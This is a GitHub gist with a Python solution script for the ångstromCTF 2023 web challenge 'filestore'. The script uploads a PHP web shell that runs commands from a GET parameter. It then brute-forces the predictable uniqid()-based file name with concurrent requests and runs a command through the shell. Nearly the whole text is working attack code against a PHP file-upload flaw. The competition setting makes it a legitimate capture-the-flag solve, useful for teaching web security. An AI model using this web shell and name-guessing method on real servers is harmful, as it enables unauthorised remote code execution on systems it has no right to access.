Created
April 27, 2023 16:12
-
-
Save arkark/1a55cc09570cee70ad3e5f6bec2250f3 to your computer and use it in GitHub Desktop.
ångstromCTF 2023 - web/filestore
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ångstromCTF 2023 - web/filestore | |
| # Solution: just bruteforce for uniqid() | |
| import httpx | |
| import subprocess | |
| from concurrent.futures import ThreadPoolExecutor | |
| # BASE_URL = "http://localhost:3000" | |
| BASE_URL = "https://filestore.web.actf.co" | |
| def f(_): | |
| httpx.post( | |
| BASE_URL, | |
| files={ | |
| "f": ( | |
| "x.php", | |
| b'<?php system($_GET["cmd"]);?>', | |
| "text/plain", | |
| ), | |
| }, | |
| ) | |
| return subprocess.run('php -r "echo uniqid();"', shell=True, capture_output=True, text=True).stdout | |
| suffix = "_dd5870e129504ca891290dfc0ee4ec63fce43df1bba8d7224642da007c043c98_x.php" | |
| with ThreadPoolExecutor(max_workers=16) as executor: | |
| xs = executor.map(f, range(64)) | |
| xs = sorted(list(xs)) | |
| start = int(xs[0], 16) | |
| print(f"{hex(start)[2:]}{suffix}") | |
| def g(i): | |
| if i % 200 == 0: | |
| print(i) | |
| file = f"{hex(start - i)[2:]}{suffix}" | |
| res = httpx.get( | |
| BASE_URL, | |
| params={ | |
| "f": file, | |
| "cmd": "echo ok", | |
| }, | |
| ) | |
| if "ok" in res.text: | |
| print(f"{i = }") # i = 4211 | |
| print(f"{file = }") # file = '644415d72a288_dd5870e129504ca891290dfc0ee4ec63fce43df1bba8d7224642da007c043c98_x.php' | |
| with ThreadPoolExecutor(max_workers=16) as executor: | |
| executor.map(g, range(16**4)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment